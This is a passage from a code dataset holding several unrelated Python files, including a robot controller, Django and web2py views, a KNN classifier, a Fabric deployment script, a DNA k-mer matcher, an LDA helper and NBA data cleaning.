dg.create_all_features_multi_cpu()\n","sub_path":"src/utils/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":18682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"48159224","text":"from pyrobot import *\nimport sys\nimport logging\nimport time\nimport SocketServer\nimport Queue\nimport threading\n\nBUFFER_SIZE = 1024\nCOMMANDS = []\nACK = \"ACK\\n\"\nCONFIG_CMD = \"__cfg_\"\nq = Queue.Queue()\np = Queue.Queue()\n\nclass RobotController(threading.Thread):\n def __init__(self, robot):\n threading.Thread.__init__(self)\n self.rtbot = robot\n def run(self):\n currentCommand = ''\n while currentCommand != \"quit\":\n currentCommand = q.get()\n if currentCommand == \"forward\":\n self.rtbot.DriveStraight(200)\n elif currentCommand == \"reverse\":\n self.rtbot.DriveStraight(-200)\n elif currentCommand == \"left\":\n self.rtbot.TurnInPlace(200, \"ccw\")\n elif currentCommand == \"right\":\n self.rtbot.TurnInPlace(200, \"cw\")\n elif currentCommand == \"stop\":\n self.rtbot.Stop()\n self.rtbot.Stop()\n\n\nclass TCPHandler(SocketServer.BaseRequestHandler):\n def handle(self):\n self.data = self.request.recv(1024).strip()\n q.put(self.data)\n if self.data == \"quit\":\n p.put(self.data)\n\n\nclass safetyController(threading.Thread):\n def __init__(self, robot):\n threading.Thread.__init__(self)\n self.rtbot = robot\n def run(self):\n while True:\n if not p.empty():\n break\n try:\n self.rtbot.sensors.GetAll()\n except PyRobotError:\n pass\n bump = self.rtbot.sensors.GetBump()\n cliff = self.rtbot.sensors.data['cliff-front-right'] or \\\n self.rtbot.sensors.data['cliff-front-left'] or \\\n self.rtbot.sensors.data['cliff-right'] or \\\n self.rtbot.sensors.data['cliff-left']\n wheelDrop = self.rtbot.sensors.data['wheel-drop-left'] or \\\n self.rtbot.sensors.data['wheel-drop-right']\n analogInput = self.rtbot.sensors.GetAnalogInput()\n\n if wheelDrop:\n q.put(\"quit\")\n break\n\n if bump: \n self.rtbot.DriveDistance(-200, 100) \n\n if cliff:\n self.rtbot.DriveDistance(-200, 100)\n\n if analogInput < 30:\n self.rtbot.DriveDistance(-200, 100)\n \n#=============================================================\n# define the Rtbot class to init and start itself\nclass Rtbot(Create):\n def __init__(self, tty='/dev/ttyUSB0'):\n super(Create, self).__init__(tty)\n self.sci.AddOpcodes(CREATE_OPCODES)\n self.sensors = CreateSensors(self)\n self.safe = False # Use full mode for control.\n\n def start(self):\n logging.debug('Starting up the Rtbot.')\n self.SoftReset()\n self.Control()\n\n def DriveDistance(self, velocity, distance):\n self.sensors.GetDistance()\n self.DriveStraight(velocity)\n dist = 0\n while(abs(dist) < distance):\n dist += self.sensors.GetDistance()\n self.Stop()\n\n def TurnAngle(self, velocity, degree, direction):\n self.sensors.GetAngle()\n self.TurnInPlace(velocity, direction)\n angle = 0\n while(abs(angle) < degree):\n angle += self.sensors.GetAngle()\n self.Stop()\n\n#=============================================================\n#place further functions in the Rtbot class e.x.\n# def somefunction(some_argvs):\n# some code\n\n\n# To implement a service, you must derive a class from BaseRequestHandler and redefine its handle() method\n\n\n#subclass of threading.Thread\n#override the run() method in a subclass\t\n \t\t\t\n 
\t\t\n","sub_path":"rts/lab3/robot/rtbot.py","file_name":"rtbot.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"2611388","text":"import numpy as np\nimport sys\nfrom pylab import *\nfrom math import *\nimport tsase\nimport ase\nfrom basin import *\nimport scipy\nimport time\n\nclass BCM():\n @classmethod\n def mag(cls,vec):\n return sqrt(dot(vec,vec))\n\n @classmethod\n def q_avg(cls,l,m,positions,cm):\n sum = complex(0,0)\n bonds = 0\n for a in range(len(positions)):\n b = a+1\n while b i) or (op == truediv and nums[j] == 0):\n continue\n next_nums.append(op(nums[i], nums[j]))\n if judge_point_24(next_nums):\n return True\n next_nums.pop()\n return False\n\n\nif __name__ == '__main__':\n filename = 'game' + '.txt'\n\n f = open(filename, 'r') # utf8 gb2312\n\n reader = f.readlines()\n\n for item in reader:\n item = item.rstrip()\n row = item.split(',')\n\n n = list()\n for i in row:\n n.append(int(i))\n\n # n = [1,2,1,2]\n # print(row)\n if judge_point_24(n):\n print('true')\n else:\n print('false')\n\n\n\n","sub_path":"contest/part1/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"487287769","text":"from django.http import Http404\nfrom django.shortcuts import render\nfrom categories.models import Category\n\n# Create your views here.\nfrom product.models import Product\n\n\ndef index(request):\n categories = Category.objects.filter(parent_category__isnull=True)\n\n special_deals = Product.objects.filter(is_active=True, is_promotion=True)\n\n return render(request, 'app/index.html', {\n 'categories': categories,\n 'special_deals': special_deals\n })\n\n\ndef product_single(request, slug):\n try:\n product = Product.objects.get(slug=slug, is_active=True)\n except Product.DoesNotExist:\n raise Http404\n\n return render(request, 'app/product-single.html', locals())\n","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"564013455","text":"# -*- coding: utf-8 -*-\n# this file is released under public domain and you can use without limitations\n\n#########################################################################\n## This is a sample controller\n## - index is the default action of any application\n## - user is required for authentication and authorization\n## - download is for downloading files uploaded in the db (does streaming)\n#########################################################################\nimport itertools\n\ndef index():\n \"\"\"\n example action using the internationalization operator T and flash\n rendered by views/default/index.html or views/generic.html\n\n if you need a simple wiki simply replace the two lines below with:\n return auth.wiki()\n \"\"\"\n response.flash = T(\"Hello World\")\n return dict(message=T('Welcome to web2py!'))\n\n\ndef user():\n \"\"\"\n exposes:\n http://..../[app]/default/user/login\n http://..../[app]/default/user/logout\n http://..../[app]/default/user/register\n http://..../[app]/default/user/profile\n http://..../[app]/default/user/retrieve_password\n http://..../[app]/default/user/change_password\n http://..../[app]/default/user/manage_users (requires membership in\n use @auth.requires_login()\n @auth.requires_membership('group name')\n 
@auth.requires_permission('read','table name',record_id)\n to decorate functions that need access control\n \"\"\"\n return dict(form=auth())\n\n\n@cache.action()\ndef download():\n \"\"\"\n allows downloading of uploaded files\n http://..../[app]/default/download/[filename]\n \"\"\"\n return response.download(request, db)\n\n\ndef call():\n \"\"\"\n exposes services. for example:\n http://..../[app]/default/call/jsonrpc\n decorate with @services.jsonrpc the functions to expose\n supports xml, json, xmlrpc, jsonrpc, amfrpc, rss, csv\n \"\"\"\n return service()\n\n##################################################################################\n#### ####\n#### COURSE PAGES ####\n#### ####\n##################################################################################\n\ndef courses():\n courses = db(Course).select()\n return dict(courses=courses)\n\ndef course():\n course_id = int(request.args(0))\n course = db(Course.id == course_id).select().first()\n open_classes = course.classes(Class.status == 3).select()\n \n Interest.course.default = course_id\n Interest.course.readable = Interest.course.writable = False\n interest_form = SQLFORM(Interest)\n if interest_form.process(onvalidation=check_if_exists).accepted:\n response.flash = T(\"Thank you!\")\n elif interest_form.errors:\n response.flash = T(\"Erros no formulário!\")\n \n return dict(\n course=course,\n open_classes=open_classes,\n interest_form=interest_form)\n\n@auth.requires_login()\ndef enroll():\n class_id = int(request.args(0))\n if not class_id:\n session.flash = T(\"No class selected!\")\n redirect(URL('courses'))\n \n Student.insert(student=auth.user.id, class_id=class_id, status=1)\n session.flash = T(\"Congrats! You're enrolled on a new course!\") \n redirect(URL('my_courses'))\n\n@auth.requires_login()\ndef my_courses():\n class_ids = db(Student.student == auth.user.id).select(Student.class_id)\n classes = db(Class.id.belongs([x.class_id for x in class_ids])).select()\n return dict(classes=classes)\n\n@auth.requires_login()\ndef my_class():\n try:\n class_id = int(request.args(0))\n except:\n redirect(URL('index'))\n my_class = db(Class.id == class_id).select().first()\n modules = db(Module.class_id == class_id).select()\n return dict(my_class=my_class, \n modules=modules)\n\n@auth.requires_login()\ndef module():\n try:\n mod_id = int(request.args(0))\n except:\n redirect(URL('index'))\n module = db(Module.id == mod_id).select().first()\n lessons = db(Lesson.lesson_module == module.id).select(orderby=Lesson.place)\n return dict(module=module,\n lessons=lessons)\n\n@auth.requires_login()\ndef lesson():\n try:\n lesson_id = int(request.args(0))\n except:\n redirect(URL('index'))\n lesson = db(Lesson.id == lesson_id).select().first()\n videos = lesson.videos.select()\n texts = lesson.texts.select()\n exercises = lesson.exercises.select()\n\n merged_records = itertools.chain(videos, texts, exercises)\n contents = sorted(merged_records, key=lambda record: record['place'])\n\n is_correct = {}\n if request.vars:\n keys = request.vars.keys()\n for key in keys:\n q_id = int(key.split('_')[1])\n question = db(Exercise.id==q_id).select().first()\n if question.correct == int(request.vars[key]):\n is_correct[key] = True\n else:\n is_correct[key] = False\n return dict(lesson=lesson,\n contents=contents,\n is_correct=is_correct)\n\n@auth.requires_login()\ndef forum():\n try:\n class_id = int(request.args(0))\n except:\n redirect(URL('index'))\n topics = db(Forum.class_id == class_id).select()\n return 
dict(topics=topics)\n\n@auth.requires_login()\ndef topic():\n try:\n topic_id = int(request.args(0))\n except:\n redirect(URL('index'))\n topic = db(Forum.id == topic_id).select().first()\n comments = db(Comment.post == topic_id).select()\n\n Comment.author.default = auth.user.id\n Comment.author.readable = Comment.author.writable = False\n Comment.post.default = topic_id\n Comment.post.readable = Comment.post.writable = False\n form = crud.create(Comment, next=URL('topic', args=topic_id))\n\n return dict(topic=topic,\n comments=comments,\n form=form)\n\n@auth.requires_login()\ndef new_topic():\n try:\n class_id = int(request.args(0))\n except:\n redirect(URL('index'))\n Forum.author.default = auth.user.id\n Forum.author.readable = Forum.author.writable = False\n Forum.class_id.default = class_id\n Forum.class_id.readable = Forum.class_id.writable = False\n form = crud.create(Forum, next=URL('topic', args='[id]'))\n return dict(form=form)\n\n@auth.requires_login()\ndef calendar():\n try:\n class_id = int(request.args(0))\n except:\n redirect(URL('index'))\n dates = db((Date.class_id == class_id)|(Date.class_id == None)).select()\n my_class = db(Class.id == class_id).select().first()\n modules = db(Module.class_id == class_id).select()\n lessons = []\n for module in modules:\n for lesson in module.lessons.select():\n lessons.append(lesson)\n return dict(dates=dates,\n my_class=my_class,\n lessons=lessons)","sub_path":"controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"475417601","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 3 2018\r\n@author: Purkialo\r\n\"\"\"\r\nimport numpy as np\r\n\r\nK_num = 20\r\n\r\ndef calcu(input,dataset):\r\n dist = []\r\n for i in range(length_train):\r\n dist.append(np.linalg.norm(input - dataset[i]))\r\n dist = np.array(dist,dtype = float).reshape(length_train,1)\r\n dist = np.hstack((dataname.reshape(length,1)[:length_train],dist))\r\n dist = np.array(sorted(dist,key = lambda result:float(result[1])))\r\n return dist\r\n\r\ndef count(input):\r\n key = np.unique(input[:,0])\r\n result = {}\r\n for k in key:\r\n mask = (input == k)\r\n arr_new = input[mask]\r\n v = arr_new.size\r\n result[k] = v\r\n result = sorted(result.items(),key=lambda result:result[1],reverse=True) \r\n return result\r\n\r\nif __name__ == '__main__':\r\n data = []\r\n name = []\r\n\r\n with open(\"letter-recognition.data\") as file:\r\n for line in file:\r\n data.append(line.strip().split(',')[1:])\r\n name.append(line.strip().split(',')[0])\r\n length = len(name)\r\n dataset = np.array(data,dtype=int)\r\n dataname = np.array(name)\r\n length_train = int(0.95 * length)\r\n length_test = length - length_train\r\n testset = dataset[length_train:]\r\n testset = dataset[length_train:].reshape(length_test,16)\r\n testname = dataname[length_train:].reshape(length_test,1)\r\n flag_r = 0\r\n flag_w = 0\r\n for i in range(length_test):\r\n result = calcu(testset[i],dataset)\r\n dic = count(result[0:K_num])\r\n if(dic[0][0] != testname[i][0]):\r\n print(dic[:3])\r\n flag_w = flag_w + 1\r\n print(\"Predicted letter: %s, actually: %s, it's wrong!\" % (str(dic[0][0]),str(testname[i][0])))\r\n else:\r\n flag_r = flag_r + 1\r\n print(\"Predicted letter: %s, actually: %s, it's right!\" % (str(dic[0][0]),str(testname[i][0])))\r\n print(\"Accuracy: \",flag_r/(flag_r + flag_w))","sub_path":"Homework/Data Analysis 
Tool/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"354619880","text":"import pandas as pd\n\n# people from: https://raw.githubusercontent.com/chadwickbureau/register/master/data/people.csv\n# sc from:\n# from pybaseball import statcast\n# data = statcast(start_dt='2008-01-01', end_dt='2018-11-30')\n# full statcast.csv.gzip file available upon request.\n\npeople = pd.read_csv(\"people.csv\")\nsc = pd.read_csv(\"statcast.csv.gzip\", compression=\"gzip\")\npeople[\"batter_name\"] = people.name_first + \" \" + people.name_last\nmerged = pd.merge(\n sc,\n people.loc[:, [\"key_mlbam\", \"batter_name\"]],\n how=\"left\",\n left_on=\"batter\",\n right_on=\"key_mlbam\",\n)\ncols2keep = [\n \"player_name\",\n \"batter_name\",\n \"pitch_type\",\n \"game_date\",\n \"release_speed\",\n \"events\",\n \"launch_speed\",\n \"woba_value\",\n \"bb_type\",\n \"balls\",\n \"strikes\",\n \"outs_when_up\",\n \"at_bat_number\",\n \"type\",\n]\nsc = merged.loc[:, cols2keep]\nsc.to_parquet(\"statcast.parquet\", engine=\"pyarrow\")\nsc.to_parquet(\n \"https://s3.amazonaws.com/hank-statcast/statcast.parquet\", engine=\"pyarrow\"\n)\n\nsc[\"date\"] = pd.to_datetime(merged[\"game_date\"])\nrecent = sc.loc[sc.date > \"2018-01-01\", :]\nrecent.drop(columns=[\"date\"], inplace=True)\nrecent.to_parquet(\"statcast2018.parquet\", engine=\"pyarrow\")\nrecent.to_parquet(\n \"https://s3.amazonaws.com/hank-statcast/statcast2018.parquet\", engine=\"pyarrow\"\n)\n","sub_path":"data/build_data.py","file_name":"build_data.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"302712366","text":"from fabric.api import cd\nfrom fabric.api import env\nfrom fabric.api import run\nimport sys\nimport time\n\n\ndef to_bool(value):\n if isinstance(value, bool):\n return value\n if not isinstance(value, basestring):\n raise ValueError(\"Must be string: %r\" % value)\n if not value:\n return False\n value = value[0].lower()\n # yes/true/ja/1\n if value in ('y', 't', 'j', '1'):\n return True\n # no/false/nee/0\n if value in ('n', 'f', '0'):\n return False\n raise ValueError(\"Cannot interpret as boolean, try true/false instead: %r\"\n % value)\n\n\ndef ontwikkel():\n env.hosts = [\n 'zope@plone-minaraad-on-3-mgt.mmis.be',\n 'zope@plone-minaraad-on-4-mgt.mmis.be',\n ]\n env.buildout_dir = '~/buildout'\n\n\ndef preview():\n env.hosts = [\n 'zope@plone-minaraad-oe-5-mgt.mmis.be',\n 'zope@plone-minaraad-oe-6-mgt.mmis.be',\n ]\n env.buildout_dir = '~/minaraad'\n\n\ndef production():\n env.hosts = [\n 'zope@plone-minaraad-pr-3-mgt.mmis.be',\n 'zope@plone-minaraad-pr-4-mgt.mmis.be',\n ]\n env.buildout_dir = '~/buildout'\n\n\ndef release(tag=None, warmup=True):\n \"\"\"Update Plone.\n \"\"\"\n warmup = to_bool(warmup)\n if not tag:\n print(\"ERROR You should run this with e.g. \"\n \"'fab preview release:tag=1.2.3' or \"\n \"'fab ontwikkel release:tag=master'.\")\n sys.exit(1)\n with cd(env.buildout_dir):\n run('bin/supervisorctl shutdown')\n run('git fetch')\n run('git checkout %s' % tag)\n if '.' 
not in tag:\n # master or other branch\n run('git pull')\n run('bin/buildout')\n run('bin/supervisord')\n if warmup:\n seconds = 10\n print('Sleeping {} seconds before warmup.'.format(seconds))\n time.sleep(seconds)\n run('bin/warmup-all')\n\n\ndef status():\n \"\"\"Show Plone status.\n \"\"\"\n with cd(env.buildout_dir):\n run('git status')\n run('git describe')\n run('bin/supervisorctl status')\n\n\ndef stop():\n \"\"\"Stop Plone.\n \"\"\"\n with cd(env.buildout_dir):\n run('bin/supervisorctl shutdown')\n\n\ndef start():\n \"\"\"Start Plone.\n \"\"\"\n with cd(env.buildout_dir):\n run('bin/supervisord')\n\n\ndef warmup():\n \"\"\"Warmup Plone/varnish.\n \"\"\"\n with cd(env.buildout_dir):\n run('bin/warmup-all')\n\n\ndef info():\n run('w')\n run('free')\n # This lists the NFS blob storage and tells how much disk space it uses.\n # This should be several Gigabytes.\n run('df -h || echo \"error during df\"')\n status()\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"493204001","text":"import contextlib\n\nimport requests\nfrom loguru import logger\n\nHOST = \"127.0.0.1\"\nPORT = 8000\napi_base = f\"http://{HOST}:{PORT}\"\n# Set device names\nsocl2_endpoint = f\"{api_base}/socl2\"\nhexyldecanoic_endpoint = f\"{api_base}/hexyldecanoic\"\nr4_endpoint = f\"{api_base}/r4-heater/0\"\nflowir_endpoint = f\"{api_base}/flowir\"\n\n\ndef check_for_errors(resp, *args, **kwargs):\n resp.raise_for_status()\n\n\ndef log_responses(resp, *args, **kwargs):\n logger.debug(f\"Reply: {resp.text} on {resp.url}\")\n\n\n@contextlib.contextmanager\ndef command_session():\n with requests.Session() as session:\n session.hooks[\"response\"] = [log_responses, check_for_errors]\n yield session\n","sub_path":"examples/autonomous_reaction_optimization/_hw_control.py","file_name":"_hw_control.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"112678598","text":"import sys\r\nimport random\r\nfrom numpy import zeros\r\nimport math\r\n\r\nrefList = sys.argv[1]\r\nCR = sys.argv[2]\r\nRandomKmerNo = 8\r\nCoverageTThreshold = 0.9\r\nRKTThreshold = 5\r\nRKTShortestED = 10\r\nRKTEDThreshold = 10\r\nLmerSpltNo = 5\r\nCoverageEDThreshold = 10\r\n\r\n\r\ndef Ktest(CR):\r\n with open(CR) as TCR:\r\n K = len(TCR.readline().rstrip())\r\n return K\r\n\r\nK = Ktest(CR)\r\n\r\ndef parseRef(ref):\r\n\r\n reff = \"\"\r\n with open(ref) as ref:\r\n name = ref.readline()[1:]\r\n while True:\r\n first_line = ref.readline()\r\n if len(first_line) == 0:\r\n break\r\n reff += first_line.rstrip()\r\n return name, reff\r\n\r\n\r\ndef refHash(refList):\r\n\r\n Hash = {}\r\n with open(refList) as rl:\r\n\r\n while True:\r\n fn = rl.readline()\r\n if len(fn) == 0:\r\n break\r\n name, reff = parseRef(fn.rstrip())\r\n Hash[name] = reff\r\n return Hash\r\n\r\nrefHash = refHash(refList)\r\n\r\ndef parseCR(CR):\r\n\r\n CRS = {}\r\n\r\n with open(CR) as cr:\r\n\r\n while True:\r\n c = cr.readline()\r\n if len(c) == 0:\r\n break\r\n A, T, C, G = c.rstrip().count(\"A\"),
c.rstrip().count(\"T\"), c.rstrip().count(\"C\"), c.rstrip().count(\"G\")\r\n if (A, T, C, G) not in CRS:\r\n a = set()\r\n a.add(c.rstrip())\r\n CRS[(A, T, C, G)] = a\r\n else: CRS[(A, T, C, G)].add(c.rstrip())\r\n\r\n return CRS\r\n\r\nCRS = parseCR(CR)\r\n\r\n\r\ndef findall(p):\r\n s = 0\r\n\r\n\r\ndef LmerSplit(read, K, LmerSpltNo):\r\n\r\n Lmers = list()\r\n if K % LmerSpltNo > 0:\r\n s = math.floor(K/LmerSpltNo)\r\n Lmers = [read[i:i + s+1] for i in range(0, (K % LmerSpltNo)*(s+1), s+1)]\r\n Lmers = Lmers + [read[i:i + s] for i in range((K % LmerSpltNo)*(s+1), K, s)]\r\n else:\r\n Lmers = [read[i:i + K/LmerSpltNo] for i in range(0, K, K/LmerSpltNo)]\r\n return Lmers\r\n\r\n\r\ndef CoverageTest(cref, CRS, K, LmerSpltNo, EDScoring, CoverageEDThreshold, CoverageTThreshold):\r\n\r\n readsCover = set()\r\n\r\n for i in CRS:\r\n TempCover = set()\r\n Lmers = LmerSplit(i, K, LmerSpltNo)\r\n LC = [len(x) for x in Lmers]\r\n positions = findall(Lmers, cref)\r\n for j, w in zip(positions, LC):\r\n ind = LC.index(w)\r\n if ind == 0:\r\n Stp = 0\r\n else: Stp = sum(w[n] for n in range(0, ind))\r\n for p in j:\r\n StpC = p - Stp\r\n ED = smithWaterman(i, cref[StpC:StpC + K], EDScoring)\r\n TempCover.add((StpC, StpC + K, ED))\r\n if min(TempCover, key = lambda x:x[2]) <= CoverageEDThreshold:\r\n minED = min(TempCover, key = lambda x:x[2])[2]\r\n for z in [z for z in TempCover if z[2] == minED]:\r\n readsCover.add(z[:-1])\r\n else: continue\r\n\r\n Cov = sorted(TempCover)\r\n Intvl = set()\r\n Tempintv = Cov[0]\r\n for m in Cov[1:]:\r\n if m[0] <= Tempintv[1]:\r\n Tempintv = [Tempintv[0], m[1]]\r\n else:\r\n Intvl.add(tuple(Tempintv))\r\n Tempintv = m\r\n\r\n Coverage = 0\r\n for f in Intvl:\r\n Coverage += f[1] - f[0]\r\n\r\n if Coverage/len(cref) >= CoverageTThreshold:\r\n return True\r\n\r\n else:\r\n return False\r\n\r\n\r\ndef randomNOKmer(seq, RandomKmerNo, K):\r\n\r\n result = set()\r\n temp = set()\r\n n = len(seq)\r\n for _ in range(RandomKmerNo):\r\n a = random.randint(0, n - K)\r\n while any(a >= i and a <= i + K for i in temp):\r\n a = random.randint(0, n - K)\r\n temp.add(a)\r\n\r\n for i in temp:\r\n result.add(seq[i:i+K])\r\n\r\n return result\r\n\r\n\r\ndef EDScoring(xc, yc):\r\n\r\n if xc == yc: return 0\r\n if xc == '-' or yc == '-': return 1\r\n else:\r\n return 1\r\n\r\n\r\ndef smithWaterman(x, y, s):\r\n\r\n D = zeros((len(x) + 1, len(y) + 1), dtype=int)\r\n for j in range(1, len(y) + 1):\r\n D[0, j] = D[0, j - 1] + s('-', y[j - 1])\r\n for i in range(1, len(x) + 1):\r\n D[i, 0] = D[i - 1, 0] + s(x[i - 1], '-')\r\n for i in range(1, len(x) + 1):\r\n for j in range(1, len(y) + 1):\r\n D[i, j] = min(D[i - 1, j - 1] + s(x[i - 1], y[j - 1]),\r\n D[i - 1, j] + s(x[i - 1], '-'),\r\n D[i, j - 1] + s('-', y[j - 1]))\r\n return D[len(x), len(y)]\r\n\r\n\r\ndef ClassificationMatch(CRS, refHash, K, RKTEDThreshold, RKTShortestED, LmerSpltNo, EDScoring,\r\n CoverageEDThreshold, CoverageTThreshold, RKTThreshold):\r\n\r\n Clist = set()\r\n\r\n for i in refHash:\r\n RK = randomNOKmer(refHash[i], RandomKmerNo, K)\r\n counter = 0\r\n for j in RK:\r\n A, T, C, G = j.count(\"A\"), j.count(\"T\"), j.count(\"C\"), j.count(\"G\")\r\n for w in [key for key in CRS if sum((abs(x - y)) for x, y in zip(key, (A, T, C, G))) / 4 <= RKTShortestED]:\r\n for z in CR[w]:\r\n sw = smithWaterman(j, z, EDScoring)\r\n if sw <= RKTEDThreshold:\r\n counter += 1\r\n break\r\n else: continue\r\n else: continue\r\n break\r\n if counter < RKTThreshold:\r\n continue\r\n else:\r\n CT = CoverageTest(refHash[i], CRS, K, 
LmerSpltNo, EDScoring, CoverageEDThreshold, CoverageTThreshold)\r\n if CT: Clist.add(i)\r\n else: continue\r\n return Clist","sub_path":"codebase/src/Core_2.0.py","file_name":"Core_2.0.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"306099336","text":"from gensim import corpora\nfrom gensim import models\nfrom gensim.models import CoherenceModel\nfrom collections import defaultdict\nimport pyLDAvis.gensim as gensimvis\nimport pyLDAvis\n\ndef get_filtered_words(docs):\n term_fre_dict = defaultdict(int)\n doc_fre_dict = defaultdict(int)\n\n for doc in docs:\n for word in doc:\n term_fre_dict[word] += 1\n for word in set(doc):\n doc_fre_dict[word] += 1\n \n max_doc_frequency = 1000\n min_doc_frequency = 3\n max_term_frequency = 7000\n min_term_frequency = 5\n \n doc_frequency_filtered = {k:v for k, v in doc_fre_dict.items() if ((v>=min_doc_frequency) and (v <= max_doc_frequency))}\n term_frequency_filtered = {k:v for k, v in term_fre_dict.items() if ((v>=min_term_frequency) and (v <= max_term_frequency))}\n both_satisfied = {k:v for k, v in term_frequency_filtered.items() if k in doc_frequency_filtered}\n \n return both_satisfied\n\ndef get_highest_topic(topic_list):\n highest_topic = 100\n highest_prob = 0\n for topic, prob in topic_list:\n if prob > highest_prob:\n highest_prob = prob\n highest_topic = topic\n return highest_topic, highest_prob\n\ndef build_doc_word_matrix(docs):\n dictionary = corpora.Dictionary(docs)\n corpus = []\n for doc in docs:\n bow = dictionary.doc2bow(doc)\n corpus.append(bow)\n\n return corpus, dictionary\n\ndef print_topic_words(model):\n f = open(f'{KEYWORD}_LDA_.txt','w')\n for topic_id in range(model.num_topics):\n word_probs = model.show_topic(topic_id, NUM_TOPIC_WORDS)\n print(\"Topic ID: {}\".format(topic_id))\n f.write(str(topic_id)+'\\n')\n for word, prob in word_probs:\n print(\"\\t{}\\t{}\".format(word, prob))\n f.write(str(word)+'\\t'+str(prob)+'\\n')\n print(\"\\n\")\n f.close()\n\ndef compute_coherence_values(dictionary, corpus, texts, limit, start=2, step=3):\n \"\"\"\n Compute c_v coherence for various number of topics\n\n Parameters:\n ----------\n dictionary : Gensim dictionary\n corpus : Gensim corpus\n texts : List of input texts\n limit : Max num of topics\n\n Returns:\n -------\n model_list : List of LDA topic models\n coherence_values : Coherence values corresponding to the LDA model with respective number of topics\n \"\"\"\n coherence_values = []\n model_list = []\n for num_topics in range(start, limit, step):\n model = models.ldamodel.LdaModel(corpus, num_topics=num_topics,\n id2word=dictionary,\n alpha='auto')\n model_list.append(model)\n coherencemodel = CoherenceModel(model=model, texts=texts, dictionary=dictionary, coherence='c_v')\n coherence_values.append(coherencemodel.get_coherence())\n\n return model_list, coherence_values","sub_path":"custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"146604262","text":"# Imports\nimport pandas as pd\nimport numpy as np\nimport os\nimport pprint\n\nimport matplotlib as plt\nimport seaborn as sns\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport nba_acquire\n\nnp.random.seed(123)\n\n#--------- DataFrame Work -----------\n\n#--------- player_data_df -----------\n# get it from nba_acquire.py\nplayer_data_df = nba_acquire.player_data()\n\n# change 'name' 
column to 'player' column so we can merge later\nplayer_data_df = player_data_df.rename(columns={\"name\" : \"player\"})\n\n#--------- players_df ---------------\n# get it from nba_acquire.py\nplayers_df = nba_acquire.data_of_players()\n\n# change 'Player' column to 'player' so we can merge later\nplayers_df = players_df.rename(columns={\"Player\" : \"player\"})\n\n# dropping duplicate column names (the same names as in seasons_stats) so that we can merge in 'final_df'\n# players_df = players_df.drop([\"player\", \"height\", \"weight\", \"college\",], axis=1)\n\n#--------- seasons_stats_df ---------\n# get it from nba_acquire.py\nseasons_stats_df = nba_acquire.seasons_stats()\n\n# get rid of duplicate columns to avoid 'ValueError: Plan shapes are not aligned' error on later df merge\n# seasons_stats_df = seasons_stats_df.loc[:,~seasons_stats_df.columns.duplicated()]\n\n# converting certain datatypes from floats to integers\nconvert_dict = {\"2_point_tries\" : int, \n \"2_pointers\" : int,\n \"3_point_tries\" : int,\n \"3_pointers\" : int, \n \"age\" : int,\n \"assists\" : int, \n \"blocks\" : int, \n \"def_rebounds\" : int, \n \"field_goal_attempts\" : int, \n \"field_goals\" : int,\n \"free_throws\" : int, \n \"free_throw_attempts\" : int, \n \"games\" : int, \n \"games_started\" : int, \n \"off_rebounds\" : int, \n \"personal_fouls\" : int, \n \"points\" : int, \n \"steals\" : int,\n \"three_pt_tries\" : int,\n \"total_rebounds\" : int, \n \"turnovers\" : int, \n \"year\" : int,\n } \n\n# # turn off column limit so I can see the data in all columns:\npd.options.display.max_columns = None\n\n# # change the datatypes\nseasons_stats_df = seasons_stats_df.astype(convert_dict) \n\n#--------- final_df -----------------\ndef final_df():\n \"\"\"\n Function to return merged and completely cleaned final_df\n \"\"\"\n\n#------------ Get cleaned player_data_df ------------\n\n player_data_df\n\n#------------ Get cleaned players_df ----------------\n\n players_df \n\n#------------ Get cleaned seasons_stats_df ----------\n\n seasons_stats_df \n\n#------------ Merging DataFrames --------------------\n\n # merging seasons_stats and player_data dfs\n final_df = pd.merge(seasons_stats_df, player_data_df, on=[\"player\"], how=\"left\")\n\n # merging 'seasons_stats' (w/ 'player_data') and 'players_dfs'\n final_df = pd.concat([final_df, players_df])\n\n # dropping duplicates for final_df\n final_df.drop_duplicates(subset=\"player\", inplace=True)\n\n # filling all nulls with a 1\n final_df = final_df.fillna(1)\n\n # changing datatypes of columns for better view\n\n final_convert = {\"2_point_tries\" : int, \n \"2_pointers\" : int,\n \"3_point_tries\" : int,\n \"3_pointers\" : int, \n \"age\" : int,\n \"assists\" : int, \n \"blocks\" : int,\n \"born\" : int, \n \"def_rebounds\" : int, \n \"field_goal_attempts\" : int, \n \"field_goals\" : int,\n \"free_throws\" : int, \n \"free_throw_attempts\" : int, \n \"games\" : int, \n \"games_started\" : int, \n \"height_inches\" : int,\n \"minutes_played\" : int, \n \"off_rebounds\" : int, \n \"personal_fouls\" : int, \n \"points\" : int, \n \"steals\" : int,\n \"three_pt_tries\" : int,\n \"total_rebounds\" : int, \n \"turnovers\" : int,\n \"weight\" : int,\n \"year\" : int,\n 